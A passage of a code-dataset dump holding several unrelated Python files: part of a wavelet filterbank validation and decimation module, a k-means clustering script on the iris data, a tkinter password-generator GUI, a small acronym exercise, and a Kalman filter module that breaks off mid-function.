).format(th_ratio_max_to_next_max)]\n did_header = did_atleast_one_header = True\n report += [\"psi_fs[{}]: {:.2e}\\n\".format(n, ratio)]\n data['sine'][n] = ratio\n\n # Decay: frequency #######################################################\n pop_if_no_header(report, did_atleast_one_header)\n report += [title(\"DECAY (frequency)\")]\n did_header = did_atleast_one_header = False\n\n # compute bandwidths\n bandwidths = [compute_bandwidth(pf, criterion_amplitude)\n for pf in psi_fs]\n\n excess_bw = N//2 if strict_analyticity else N\n for n, bw in enumerate(bandwidths):\n if bw == excess_bw:\n if not did_header:\n report += [(\"Found filter(s) that never sufficiently decay \"\n \"in frequency:\\n\")]\n did_header = did_atleast_one_header = True\n report += [\"psi_fs[{}], bandwidth={}\\n\".format(n, bw)]\n\n # handle case where a filter first decays and then rises again\n if unimodal:\n def decayed_then_rose(epf):\n criterion_energy = criterion_amplitude**2\n decay_idxs = np.where(epf < criterion_energy)[0]\n if len(decay_idxs) == 0:\n # never decayed\n return False\n\n first_decay_idx = decay_idxs[0]\n bound = len(epf)//2 # exclude opposite half\n rise_idxs = np.where(epf[first_decay_idx + 1:bound + 1] >\n criterion_energy)[0]\n return bool(len(rise_idxs) > 0)\n\n did_header = False\n for n, pf in enumerate(psi_fs):\n # center about n=0 to handle left & right separately\n pf = np.roll(pf, -np.argmax(np.abs(pf)))\n epf = np.abs(pf)**2\n\n dtr_right = decayed_then_rose(epf)\n # frequency-reverse\n epf[1:] = epf[1:][::-1]\n dtr_left = decayed_then_rose(epf)\n\n # both apply regardless of `strict_analyticity`\n # (since one of them should be impossible if it's `True`)\n if dtr_left or dtr_right:\n if not did_header:\n report += [(\"Found filter(s) that decay then rise again in \"\n \"frequency:\\n\")]\n did_header = did_atleast_one_header = True\n report += [\"psi_fs[{}]\\n\".format(n)]\n\n # Decay: boundary effects ################################################\n pop_if_no_header(report, did_atleast_one_header)\n report += [title(\"DECAY (boundary effects)\")]\n did_header = did_atleast_one_header = False\n th_ratio_max_to_min = (1 / criterion_amplitude)\n\n psis = [np.fft.ifft(p) for p in psi_fs]\n apsis = [np.abs(p) for p in psis]\n for n, ap in enumerate(apsis):\n ratio = ap.max() / (ap.min() + eps)\n if ratio < th_ratio_max_to_min:\n if not did_header:\n report += [(\"Found filter(s) with incomplete decay (will incur \"\n \"boundary effects), with following ratios of \"\n \"amplitude max to edge (less is worse; threshold \"\n \"is {}):\\n\").format(1 / criterion_amplitude)]\n did_header = did_atleast_one_header = True\n report += [\"psi_fs[{}]: {:.1f}\\n\".format(n, ratio)]\n data['decay'][n] = ratio\n\n # check lowpass\n if phi_f is not None:\n aphi = np.abs(np.fft.ifft(phi_f))\n ratio = aphi.max() / (aphi.min() + eps)\n if ratio < th_ratio_max_to_min:\n nl = \"\\n\" if did_header else \"\"\n report += [(\"{}Lowpass filter has incomplete decay (will incur \"\n \"boundary effects), with following ratio of amplitude \"\n \"max to edge: {:.1f} > {}\\n\").format(nl, ratio,\n th_ratio_max_to_min)]\n did_header = did_atleast_one_header = True\n data['decay'][-1] = ratio\n\n # Phase ##################################################################\n pop_if_no_header(report, did_atleast_one_header)\n report += [title(\"PHASE\")]\n did_header = did_atleast_one_header = False\n th_imag_mean = eps\n\n for n, p in enumerate(psi_fs):\n imag_mean = np.abs(p.imag).mean()\n if imag_mean > th_imag_mean:\n if not did_header:\n report += [(\"Found filters with non-zero phase, with following \"\n \"absolute mean imaginary values:\\n\")]\n did_header = did_atleast_one_header = True\n report += [\"psi_fs[{}]: {:.1e}\\n\".format(n, imag_mean)]\n data['imag_mean'][n] = imag_mean\n\n # Aliasing ###############################################################\n def diff_extend(diff, th, cond='gt', order=1):\n # the idea is to take `diff` without losing samples, if the goal is\n # `where(diff == 0)`; `diff` is forward difference, and two samples\n # participated in producing the zero, where later one's index is dropped\n # E.g. detecting duplicate peak indices:\n # [0, 1, 3, 3, 5] -> diff gives [2], so take [2, 3]\n # but instead of adding an index, replace next sample with zero such that\n # its `where == 0` produces that index\n if order > 1:\n diff_e = diff_extend(diff, th)\n for o in range(order - 1):\n diff_e = diff_e(diff_e, th)\n return diff_e\n\n diff_e = []\n d_extend = 2*th if cond == 'gt' else th\n prev_true = False\n for d in diff:\n if prev_true:\n diff_e.append(d_extend)\n prev_true = False\n else:\n diff_e.append(d)\n if (cond == 'gt' and np.abs(d) > th or\n cond == 'eq' and np.abs(d) == th):\n prev_true = True\n if prev_true:\n # last sample was zero; extend\n diff_e.append(d_extend)\n return np.array(diff_e)\n\n if unimodal:\n pop_if_no_header(report, did_atleast_one_header)\n report += [title(\"ALIASING\")]\n did_header = did_atleast_one_header = False\n eps_big = eps * 100 # ease threshold for \"zero\"\n\n if len(peak_idxs) < 6:\n warnings.warn(\"Alias detector requires at least 6 wavelets to \"\n \"work properly, per repeated `np.diff`\")\n\n # check whether peak locations follow a linear or exponential\n # distribution, progressively dropping those that do to see if any remain\n\n # x[n] = A^n + C; x[n] - x[n - 1] = A^n - A^(n-1) = A^n*(1 - A) = A^n*C\n # log(A^n*C) = K + n; diff(diff(K + n)) == 0\n # `abs` for anti-analytic case with descending idxs\n logdiffs = np.diff(np.log(np.abs(np.diff(peak_idxs))), 2)\n # In general it's impossible to determine whether a rounded sequence\n # samples an exponential, since if the exponential rate (A in A^n) is\n # sufficiently small, its rounded values will be linear over some portion.\n # However, it cannot be anything else, and we are okay with linear\n # (unless constant, i.e. duplicate, captured elsewhere) - thus the net\n # case of `exp + lin` is still captured. The only uncertainty is in\n # the threshold; assuming deviation by at most 1 sample, we set it to 1.\n # A test is:\n # `for b in linspace(1.2, 6.5, 500): x = round(b**arange(10) + 50)`\n # with `if any(abs(diff, o).min() == 0 for o in (1, 2, 3)): continue`,\n # Another with: `linspace(.2, 1, 500)` and `round(256*b**arange(10) + 50)`\n # to exclude `x` with repeated or linear values\n # However, while this has no false positives (never misses an exp/lin),\n # it can also count some non-exp/lin as exp/lin, but this is rare.\n # To be safe, per above test, we use the empirical value of 0.9\n logdiffs_extended = diff_extend(logdiffs, .9)\n if len(logdiffs_extended) > len(logdiffs) + 2:\n # this could be `assert` but not worth erroring over this\n warnings.warn(\"`len(logdiffs_extended) > len(logdiffs) + 2`; will \"\n \"use more conservative estimate on peaks distribution\")\n logdiffs_extended = logdiffs\n keep = np.where(np.abs(logdiffs_extended) > .9)\n # note due to three `diff`s we artificially exclude 3 samples\n peak_idxs_remainder = peak_idxs[keep]\n\n # now constant (diff_order==1) and linear (diff_order==2)\n for diff_order in (1, 2):\n idxs_diff2 = np.diff(peak_idxs_remainder, diff_order)\n keep = np.where(np.abs(idxs_diff2) > eps_big)\n peak_idxs_remainder = peak_idxs_remainder[keep]\n\n # if anything remains, it's neither\n if len(peak_idxs_remainder) > 0:\n report += [(\"Found Fourier peaks that are spaced neither \"\n \"exponentially nor linearly, suggesting possible \"\n \"aliasing.\\npsi_fs[n], n={}\\n\"\n ).format(peak_idxs_remainder)]\n data['alias_peak_idxs'] = peak_idxs_remainder\n did_header = did_atleast_one_header = True\n\n # Frequency-bandwidth tiling; CQT ########################################\n # note, we checked for linear/exponential spacing in \"Aliasing\" section\n if unimodal:\n pop_if_no_header(report, did_atleast_one_header)\n report += [title(\"FREQUENCY-BANDWIDTH TILING\")]\n did_header = did_atleast_one_header = False\n\n def isnt_lower_quarter(pidx):\n return ((is_analytic and pidx > N//8) or\n (not is_analytic and pidx < (N - N//8)))\n\n got_peaks_above_first_quarter = any(isnt_lower_quarter(peak_idx)\n for peak_idx in peak_idxs)\n if got_peaks_above_first_quarter:\n # idxs must reflect distance from DC\n if is_analytic:\n peak_idxs_dist = peak_idxs\n else:\n peak_idxs_dist = [N - peak_idx for peak_idx in peak_idxs]\n\n # compute bandwidths, accounting for strict analyticity;\n # can infer full intended bandwidth from just one half\n if strict_analyticity:\n if is_analytic:\n # right is trimmed\n bandwidths = [compute_bandwidth(pf, criterion_amplitude,\n return_sided=True)[0]\n for pf in psi_fs]\n else:\n # left is trimmed\n bandwidths = [compute_bandwidth(pf, criterion_amplitude,\n return_sided=True)[1]\n for pf in psi_fs]\n else:\n bandwidths = [compute_bandwidth(pf, criterion_amplitude)\n for pf in psi_fs]\n\n Qs_upper_quarters = {n: peak_idx_dist / bw\n for n, (peak_idx_dist, bw)\n in enumerate(zip(peak_idxs_dist, bandwidths))\n # must still use original peak idxs here\n if isnt_lower_quarter(peak_idxs[n])}\n\n Qs_values = list(Qs_upper_quarters.values())\n tolerance = .01 # abs relative difference tolerance 1%\n # pick most favorable reference\n Qs_diffs = np.abs(np.diff(Qs_values))\n Q_ref = Qs_values[np.argmin(Qs_diffs) + 1]\n\n non_cqts = []\n for n, Q in Qs_upper_quarters.items():\n if abs(Q - Q_ref) / Q_ref > tolerance:\n non_cqts.append((n, Q))\n\n if len(non_cqts) > 0:\n non_cqt_strs = [\"psi_fs[{}], Q={}\".format(n, Q)\n for n, Q in zip(*zip(*non_cqts))]\n report += [(\"Found non-CQT wavelets in upper quarters of \"\n \"frequencies - i.e., `(center freq) / bandwidth` \"\n \"isn't constant: \\n{}\\n\"\n ).format(\"\\n\".join(non_cqt_strs))]\n data['non_cqts'] = non_cqts\n did_header = did_atleast_one_header = True\n\n # Temporal peak ##########################################################\n if unimodal:\n # check that temporal peak is at t==0 ################################\n pop_if_no_header(report, did_atleast_one_header)\n report += [title(\"TEMPORAL PEAK\")]\n did_header = did_atleast_one_header = False\n\n for n, ap in enumerate(apsis):\n peak_idx = np.argmax(ap)\n if peak_idx != 0:\n if not did_header:\n report += [(\"Found filters with temporal peak not at t=0!, \"\n \"with following peak locations:\\n\")]\n did_header = did_atleast_one_header = True\n report += [\"psi_fs[{}]: {}\\n\".format(n, peak_idx)]\n data['time_peak_idx'][n] = peak_idx\n\n # check that there is only one temporal peak #########################\n did_header = False\n for n, ap in enumerate(apsis):\n # count number of inflection points (where sign of derivative changes)\n # exclude very small values\n # center for proper `diff`\n ap = np.fft.ifftshift(ap)\n inflections = np.diff(np.sign(np.diff(ap[ap > 10*eps])))\n n_inflections = sum(np.abs(inflections) > eps)\n\n if n_inflections > 1:\n if not did_header:\n report += [(\"\\nFound filters with multiple temporal peaks \"\n \"(or incomplete/non-smooth decay)! \"\n \"(more precisely, >1 inflection points) with \"\n \"following number of inflection points:\\n\")]\n did_header = did_atleast_one_header = True\n report += [\"psi_fs[{}]: {}\\n\".format(n, n_inflections)]\n data['n_inflections'] = n_inflections\n else:\n pop_if_no_header(report, did_atleast_one_header)\n\n # Print report ###########################################################\n report = ''.join(report)\n data['report'] = report\n if verbose:\n if len(report) == 0: # no-cov\n print(\"Perfect filterbank!\")\n else:\n print(report)\n return data\n\n\n# reusables / convenience ####################################################\ndef compute_lp_sum(psi_fs, phi_f=None, J=None, log2_T=None,\n fold_antianalytic=False):\n lp_sum = 0\n for psi_f in psi_fs:\n lp_sum += np.abs(psi_f)**2\n if phi_f is not None and (\n # else lowest frequency bandpasses are too attenuated\n log2_T is not None and J is not None and log2_T >= J):\n lp_sum += np.abs(phi_f)**2\n\n if fold_antianalytic:\n lp_sum = fold_lp_sum(lp_sum, analytic_part=True)\n return lp_sum\n\n\ndef fold_lp_sum(lp_sum, analytic_part=True):\n if analytic_part:\n # reflect anti-analytic part onto analytic;\n # goal is energy conservation - if this is ignored and we\n # normalize analytic part perfectly to 2, the non-zero negative\n # freqs will make the filterbank energy-expansive\n\n # sum onto positives, excluding DC and Nyquist,\n # from negatives, excluding Nyquist\n lp_sum[1:len(lp_sum)//2] += lp_sum[len(lp_sum)//2 + 1:][::-1]\n # zero what we just carried over to not duplicate later by accident\n lp_sum[len(lp_sum)//2 + 1:] = 0\n # with `analytic=True`, this has no effect (all negatives == 0)\n # (note, \"analytic\" in \"analytic_only\" includes pseudo-analytic)\n else:\n # above, but in reverse\n lp_sum[len(lp_sum)//2 + 1:] += lp_sum[1:len(lp_sum)//2][::-1]\n lp_sum[1:len(lp_sum)//2] = 0\n return lp_sum\n\n\n# decimate object ############################################################\nclass Decimate():\n def __init__(self, backend='numpy', dtype=None, sign_correction='abs',\n cutoff_mult=1.):\n \"\"\"Windowed-sinc decimation.\n\n Filters are automatically moved to the input's device, each time an\n input's device changes from previous.\n\n Parameters\n ----------\n backend : str['numpy', 'torch', 'jax'] / module\n Name of module, or module object, to use as backend.\n TensorFlow currently not supported.\n\n dtype : str['float32', 'float64'] / None\n Whether to compute and store filters in single or double precision.\n\n sign_correction: str / None\n None: no correction\n\n 'abs': `abs(out)`.\n An explored alternative was `out -= out.min()`, but it's not\n favored per\n - shifting the entire output (dc bias), while the negatives\n don't result from such a shift\n - the negatives are in minority and vary with \"noisy\" factors\n such as boundary effects and signal regularity, making\n the process itself noisy and sensitive to outliers\n \"\"\"\n # input checks\n assert sign_correction in (None, 'abs'), sign_correction\n if not isinstance(dtype, (str, type(None))):\n dtype = str(dtype).split('.')[-1] # e.g. 'torch.float32'\n assert dtype in (None, 'float32', 'float64'), dtype\n\n self.dtype = dtype\n self.sign_correction = sign_correction\n self.cutoff_mult = cutoff_mult\n\n # handle `backend`\n if isinstance(backend, str):\n self.backend_name = backend\n import importlib\n backend = importlib.import_module('wavespin.scattering1d.backend.'\n + self.backend_name + \"_backend\",\n 'backend').backend\n else:\n self.backend_name = backend.__module__.split('.')[-1].rstrip(\n '_backend')\n self.Bk = backend\n\n # complete module of backend\n if self.backend_name == 'torch':\n import torch\n self.B = torch\n elif self.backend_name == 'tensorflow':\n raise NotImplementedError(\"TensorFlow currently isn't supported.\")\n elif self.backend_name == 'jax':\n import jax\n self.B = jax\n if self.dtype == 'float64': # no-cov\n _check_jax_double_precision()\n else:\n self.B = np\n\n # instantiate reusables\n self.filters = {}\n self.unpads = {}\n self.pads = {}\n\n def __call__(self, x, factor, axis=-1, x_is_fourier=False):\n \"\"\"Decimate input (anti-alias filter + subsampling).\n\n Parameters\n ----------\n x : tensor\n n-dim tensor.\n\n factor : int\n Subsampling factor, must be power of 2.\n\n axis : int\n Axis along which to decimate. Negative supported.\n\n x_is_fourier : bool (default False)\n Whether `x` is already in frequency domain.\n If possible, it's more performant to pass in `x` in time domain\n as it's passed to time domain anyway before padding (unless it\n won't require padding, which is possible).\n\n Returns\n -------\n o : tensor\n `x` decimated along `axis` axis by `factor` factor.\n \"\"\"\n assert np.log2(factor).is_integer()\n key = (factor, x.shape[axis])\n if key not in self.filters:\n self.make_filter(key)\n return self.decimate(x, key, axis, x_is_fourier)\n\n def decimate(self, x, key, axis=-1, x_is_fourier=False):\n xf, filtf, factor, ind_start, ind_end = self._handle_input(\n x, key, axis, x_is_fourier)\n\n # convolve, subsample, unpad\n of = xf * filtf\n of = self.Bk.subsample_fourier(of, factor, axis=axis)\n o = self.Bk.ifft_r(of, axis=axis)\n o = self.Bk.unpad(o, ind_start, ind_end, axis=axis)\n\n # sign correction\n if self.sign_correction == 'abs':\n o = self.Bk.modulus(o)\n\n return o\n\n def _handle_input(self, x, key, axis, x_is_fourier):\n # from `key` get filter & related info\n factor, N = key\n filtf = self.filters[key]\n ind_start, ind_end = self.unpads[key]\n pad_left, pad_right = self.pads[key]\n\n # pad `x` if necessary; handle domain\n if pad_left != 0 or pad_right != 0:\n if x_is_fourier:\n xf = x\n x = self.Bk.ifft(xf, axis=axis)\n xp = self.Bk.pad(x, pad_left, pad_right, pad_mode='zero', axis=axis)\n xf = self.Bk.fft(xp, axis=axis)\n elif not x_is_fourier:\n xf = self.Bk.fft(x, axis=axis)\n else:\n xf = x\n\n # broadcast filter to input's shape\n broadcast = [None] * x.ndim\n broadcast[axis] = slice(None)\n filtf = filtf[tuple(broadcast)]\n\n # handle device\n if self.backend_name == 'torch':\n if not hasattr(filtf, 'device'):\n filtf = self.B.from_numpy(filtf).to(device=x.device)\n elif filtf.device != x.device:\n filtf = filtf.to(device=x.device)\n elif self.backend_name == 'jax':\n if not hasattr(filtf, 'device') or filtf.device() != x.device():\n filtf = self.B.device_put(filtf, device=x.device())\n\n return xf, filtf, factor, ind_start, ind_end\n\n def make_filter(self, key):\n \"\"\"Create windowed sinc, centered at n=0 and padded to a power of 2,\n and compute pad and unpad parameters.\n\n The filters are keyed by `key = (factor, N)`, where `factor` and `N`\n are stored with successive calls to `Decimate`, yielding dynamic\n creation and storage of filters.\n \"\"\"\n q, N = key\n half_len = 10 * q\n n = int(2 * half_len)\n cutoff = (1. / q) * self.cutoff_mult\n\n filtf, unpads, pads = self._make_decimate_filter(n + 1, cutoff, q, N)\n self.filters[key] = filtf\n self.unpads[key] = unpads\n self.pads[key] = pads\n\n # helpers ################################################################\n def _make_decimate_filter(self, numtaps, cutoff, q, N):\n h = self._windowed_sinc(numtaps, cutoff)\n\n # for FFT conv\n ((pad_left_x, pad_right_x), (pad_left_filt, pad_right_filt)\n ) = self._compute_pad_amount(N, h)\n h = np.pad(h, [pad_left_filt, pad_right_filt])\n\n # time-center filter about 0 (in DFT sense, n=0)\n h = np.roll(h, -np.argmax(h))\n # take to fourier\n hf = np.fft.fft(h)\n # assert zero phase (imag part zero)\n assert hf.imag.mean() < 1e-15, hf.imag.mean()\n # keep only real part\n hf = hf.real\n\n # backend, device, dtype\n hf = self._handle_backend_dtype(hf)\n\n # account for additional padding\n ind_start = int(np.ceil(pad_left_x / q))\n ind_end = int(np.ceil((N + pad_left_x) / q))\n\n return hf, (ind_start, ind_end), (pad_left_x, pad_right_x)\n\n def _compute_pad_amount(self, N, h):\n # don't concern with whether it decays to zero sooner, assume worst case\n support = len(h)\n # since we zero-pad, can halve (else we'd pad by `support` on each side)\n to_pad = support\n # pow2 for fast FFT conv\n padded_pow2 = int(2**np.ceil(np.log2(N + to_pad)))\n\n # compute padding for input\n pad_right_x = padded_pow2 - N\n pad_left_x = 0\n # compute padding for filter\n pad_right_filt = padded_pow2 - len(h)\n pad_left_filt = 0\n\n return (pad_left_x, pad_right_x), (pad_left_filt, pad_right_filt)\n\n def _windowed_sinc(self, numtaps, cutoff):\n \"\"\"Sample & normalize windowed sinc, in time domain\"\"\"\n win = scipy.signal.get_window(\"hamming\", numtaps, fftbins=False)\n\n # sample, window, & norm sinc\n alpha = 0.5 * (numtaps - 1)\n m = np.arange(0, numtaps) - alpha\n h = win * cutoff * np.sinc(cutoff * m)\n h /= h.sum() # L1 norm\n\n return h\n\n def _handle_backend_dtype(self, hf):\n if self.backend_name == 'numpy':\n hf = hf.astype(self.dtype)\n\n elif self.backend_name == 'torch':\n hf = self.B.from_numpy(hf)\n dtype = (getattr(self.B, self.dtype)\n if isinstance(self.dtype, str) else\n self.dtype)\n hf = hf.to(dtype=dtype)\n\n elif self.backend_name == 'tensorflow': # no-cov\n raise NotImplementedError\n\n elif self.backend_name == 'jax':\n hf = self.B.numpy.array(hf, dtype=self.dtype)\n\n return hf\n\n\ndef _get_ranger(verbose):\n if verbose:\n if trange is None: # no-cov\n warnings.warn(\"Progress bar requires `tqdm` installed.\")\n ranger = range\n else:\n ranger = trange\n else: # no-cov\n ranger = range\n return ranger\n","repo_name":"gptanon/dumfail","sub_path":"wavespin/modules/_toolkit/filterbank.py","file_name":"filterbank.py","file_ext":"py","file_size_in_byte":63527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"22937348353","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nfrom sklearn.datasets import load_iris\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\nimport random as rd\n\n# データの取得\niris = load_iris()\nx = iris.data\n\n# PCA による二次元への圧縮\ndatas = len(x)\nfactors = len(x[0])\nC = np.zeros((factors,factors))\nfor i in range(datas):\n tmp = x[i].reshape(factors,1)\n C += tmp.dot(tmp.T)\n_, e = np.linalg.eigh(C)\nT = e[:, :-3:-1]\ncompressed = x.dot(T)\n\nplt.figure()\ncolors = ['violet','skyblue','yellow']\ncmap = ListedColormap(colors)\nplt.scatter(compressed.T[0],compressed.T[1],c=iris.target,cmap=cmap,alpha=0.5)\nplt.savefig(\"compressed.png\")\n\n# k 平均クラスタリング\nc = 3\nmu = np.array([compressed[rd.randrange(datas)] for _ in range(c)])\ny = np.array([rd.randrange(c) for _ in range(datas)])\n\ndef add(x,y,c):\n ans = np.array([0.0 for _ in range(2)])\n for i in range(datas):\n if y[i] == c:\n ans += x[i]\n return ans\n\nwhile True:\n new_y = np.array([np.argmin(np.array([np.linalg.norm(compressed[i]-mu[j],ord=2) for j in range(c)])) for i in range(datas)])\n nc = np.array([np.count_nonzero(new_y==i) for i in range(c)])\n new_mu = np.array([1.0/nc[i]*add(compressed,new_y,i) for i in range(c)])\n if (new_y == y).all() and (new_mu == mu).all():\n y = new_y\n mu = new_mu\n break\n y = new_y\n mu = new_mu\n\nplt.figure()\nplt.scatter(compressed.T[0],compressed.T[1],c=y,cmap=cmap,alpha=0.5)\ncolors = ['red','blue','gold']\ncmap = ListedColormap(colors)\nplt.scatter(mu.T[0],mu.T[1],marker='x',c=np.array(range(c)),cmap=cmap)\nplt.savefig(\"clustered.png\")\n","repo_name":"hashi0203/ML-scratch","sub_path":"K-Means-Clustering/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4508083030","text":"from tkinter import *\nimport tkinter as tk\nfrom tkinter import messagebox, ttk\nfrom aleatorio import aleatorio\n \ndef generar():\n longitud = Long.get()\n #mayusculas = MayuDrop.get()\n mayusculas = MayuDrop.get()\n #caracter = CaraDrop.get() \n caracter = CaraDrop.get() \n contra.contraF(longitud, mayusculas, caracter) \n \ncontra = aleatorio() \n \nventana= Tk() \nventana.geometry(\"600x400\")\nventana.title(\"Generador de contraseñas\")\n\n##Secciones\nseccion1= Frame(ventana,bg= \"black\")\nseccion1.pack(expand=True,fill='both')\n \nseccion2= Frame(ventana,bg= \"black\")\nseccion2.pack(expand=True,fill='both')\n\nseccion3= Frame(ventana, bg=\"black\")\nseccion3.pack(expand=True,fill='both')\n\n##Textos\ntxtinicio= Label(seccion1,text=\"Generador de contraseñas\",bg= \"black\", fg=\"orange\")\ntxtinicio.configure(font=(\"arial\", 14))\ntxtinicio.place(width=\"650\", height=\"80\")\n\ntxtLon= Label(seccion2,text=\"Longitud: \",bg= \"black\", fg=\"orange\")\ntxtLon.configure(font=(\"arial\",10))\ntxtLon.place(x=90,y=40)\n\ntxtMayu= Label(seccion2,text=\"Mayusculas: \",bg= \"black\", fg=\"orange\")\ntxtMayu.configure(font=(\"arial\",10))\ntxtMayu.place(x=90,y=80)\n\ntxtCar= Label(seccion2,text=\"Caracteres: \",bg= \"black\", fg=\"orange\")\ntxtCar.configure(font=(\"arial\",10))\ntxtCar.place(x=90,y=110)\n\n#campos de interaccion \nLong= Entry(seccion2, bg=\"#F3F3F3\")\nLong.place(x=150, y=43)\n\nmayusculas = StringVar()\nMenuMayu = [\n 'Yes',\n 'No'\n]\nmayusculas.set(MenuMayu[0])\nMayuDrop = OptionMenu (seccion2,mayusculas, *MenuMayu)\nMayuDrop.place(x=170, y=73)\n\ncaracteres = StringVar()\nMenuCara = [\n 'Yes',\n 'No'\n]\nmayusculas.set(MenuCara[0])\nCaraDrop = OptionMenu (seccion2,mayusculas, *MenuCara)\nCaraDrop.place(x=170, y=100)\n\"\"\"MayuDrop= Entry(seccion2, bg=\"#F3F3F3\")\nMayuDrop.place(x=170, y=80)\n\nCaraDrop= Entry(seccion2, bg=\"#F3F3F3\")\nCaraDrop.place(x=170, y=110)\"\"\"\n\n##Boton\nbotonGenerar = Button(seccion3,text=\"Generar\", fg= \"black\", bg=\"orange\",command=generar)\nbotonGenerar.place(x=90, y=40)\n\nventana.mainloop()","repo_name":"VTYTaquitos/Practica14to","sub_path":"tkinther/P13/contrase.py","file_name":"contrase.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70041786660","text":"stopwords = ['to', 'a', 'for', 'by', 'an', 'am', 'the', 'so', 'it', 'and', 'The']\nsent = \"The water earth and air are vital\"\nacro=\"\"\n#print(org.split(\" \"))\nfor word in sent.split(\" \"):\n if word not in stopwords:\n acro+=word[0].upper()+word[1].upper()+\". \"\n#jjacro.pop()\n\nprint(acro)\n\n\n","repo_name":"joselbr2099/PythonCurse","sub_path":"ejerCoursera/strings-list/ejer10.py","file_name":"ejer10.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7415889638","text":"'''\nSeparate functions used by the Robust class but for some reason not included\n'''\n\nimport numpy as np\nimport scipy as sp\nimport scipy.linalg as la\nimport quantecon as qe\nimport pandas as pd\nimport control as cont\nfrom scipy.stats import lognorm\nfrom scipy.interpolate import interp1d\n\n\n\ndef loglh(param, data, N=2, M=2, K=2, model = 'unrestricted'):\n return kalman_filter(param, data, N=N, M=M, K=K, model = model)[0]\n\n\ndef kalman_filter(param, data, N=2, M=2, K=2, model = 'unrestricted'):\n '''\n Objective function (for the NOT demeaned series),\n i.e. y_t = [log C_t, log P_t]^T without demeaning them\n\n Model:\n dy_{t+1} = beta0_D + beta1_D x_{t} + alpha_D w_{t+1}\n x_{t+1} = phi_D + kappa_D x_{t} + sigma_D w_{t+1}\n\n alpha_D w_{t+1} is the Wold error/whitened error\n Omega = alpha_D (alpha_D)^T is MxM\n '''\n data = np.atleast_2d(data)\n\n if model == 'restricted_1':\n phi_D, kappa_D, sigma_D, beta0_D, beta1_D, alpha_D = extract_params(param[:14], N, M, K, model = model)\n if len(param) == 14:\n MuX_inf = (np.eye(N) - kappa_D) @ phi_D\n x = MuX_inf\n elif len(param) > 14:\n x = param[-2:].reshape(N, 1)\n\n elif model == 'restricted_2':\n phi_D, kappa_D, sigma_D, beta0_D, beta1_D, alpha_D = extract_params(param[:13], N, M, K, model = model)\n# beta0_D = np.mean(data, 0).reshape((M, 1))\n if len(param) == 13:\n MuX_inf = (np.eye(N) - kappa_D) @ phi_D\n x = MuX_inf\n elif len(param) > 13:\n x = param[-2:].reshape(N, 1)\n\n elif model == 'restricted_3':\n phi_D, kappa_D, sigma_D, beta0_D, beta1_D, alpha_D = extract_params(param[:11], N, M, K, model = model)\n beta0_D = np.mean(data, 0).reshape((M, 1))\n if len(param) == 11:\n MuX_inf = (np.eye(N) - kappa_D) @ phi_D\n x = MuX_inf\n elif len(param) > 11:\n x = param[-2:].reshape(N, 1)\n\n Omega = alpha_D @ alpha_D.T\n T, m = data.shape\n\n try:\n #---------------------------------------------------------------------\n # Rule out \"bad scenarios\":\n # (1) the kappa_D matrix is unstable\n # (2) \"singular\" covariance matrix for the forecast error\n # (3) covariance matrices are not positive semidefinite\n cond1 = max(abs(la.eig(kappa_D)[0])) > 1\n cond2 = la.det(Omega) < 10e-50\n cond3 = min(la.eig(Omega)[0]) < 0 or min(la.eig(sigma_D @ sigma_D.T)[0]) < 0\n bad_scenario = any([cond1, cond2, cond3])\n\n if bad_scenario:\n return -10**6, np.nan*np.ones((N, T)), np.nan*np.ones((T, 1))\n else:\n llh = np.zeros((T, 1))\n XX = np.zeros((N, T + 1))\n\n XX[:, 0] = x.squeeze()\n invomega = la.inv(Omega)\n alphainv = la.inv(alpha_D)\n\n for tt in range(T):\n y = np.asarray([data[tt, :]]).T\n xL = x\n u = y - beta0_D - beta1_D @ xL\n x = phi_D + kappa_D @ xL + sigma_D @ (alphainv @ u)\n XX[:, tt+1] = x.squeeze()\n llh[tt] = -0.5*( m * np.log(2*np.pi) + np.log(la.det(Omega)) + u.T @ invomega @ u )\n\n return llh.sum()/T, XX[:, :-1], llh\n\n except ValueError:\n return -10**6, np.nan*np.ones((N, T)), np.nan*np.ones((T, 1))\n\n\ndef kalman_smoother(param, data, N=2, M=2, K=2, model = 'unrestricted'):\n '''\n Objective function (for the NOT demeaned series),\n i.e. y_t = [log C_t, log P_t]^T without demeaning them\n\n Model:\n dy_{t+1} = beta0_D + beta1_D x_{t} + alpha_D w_{t+1}\n x_{t+1} = phi_D + kappa_D x_{t} + sigma_D w_{t+1}\n\n alpha_D w_{t+1} is the Wold error/whitened error\n Omega = alpha_D (alpha_D)^T is MxM\n '''\n data = np.atleast_2d(data)\n\n if model == 'restricted_2':\n phi_D, kappa_D, sigma_D, beta0_D, beta1_D, alpha_D = extract_params(param[:13], N, M, K, model = model)\n if len(param) == 13:\n MuX_inf = (np.eye(N) - kappa_D) @ phi_D\n x = MuX_inf\n elif len(param) > 13:\n x = param[-2:].reshape(N, 1)\n\n elif model == 'restricted_3':\n phi_D, kappa_D, sigma_D, beta0_D, beta1_D, alpha_D = extract_params(param[:11], N, M, K, model = model)\n beta0_D = np.mean(data, 0).reshape((M, 1))\n if len(param) == 11:\n MuX_inf = (np.eye(N) - kappa_D) @ phi_D\n x = MuX_inf\n elif len(param) > 11:\n x = param[-2:].reshape(N, 1)\n\n T, m = data.shape\n\n\n # Matrices to store values\n X_now = np.zeros((N, T)) # E[x_{t} | F_t]\n X_next = np.zeros((N, T+1)) # E[x_{t+1} | F_t]\n P_now = np.zeros((N, N, T)) # P_{t|t}\n P_next = np.zeros((N, N, T+1)) # P_{t+1|t}\n\n Omega = alpha_D @ alpha_D.T\n invomega = la.inv(Omega)\n Q = sigma_D @ sigma_D.T\n\n # Initialize the Kalman filter (X_next[:, 0] is zero)\n P_next[:, :, 0] = qe.solve_discrete_lyapunov(kappa_D, Q)\n\n\n #-----------------------------------------------------\n # Kalman filter: (data: t)\n #-----------------------------------------------------\n for t in range(T):\n\n omega = beta1_D @ P_next[:, :, t] @ beta1_D.T + Omega\n invomega = la.inv(omega)\n y = np.asarray([data[t, :]]).T\n a = y - beta0_D - beta1_D @ X_next[:, 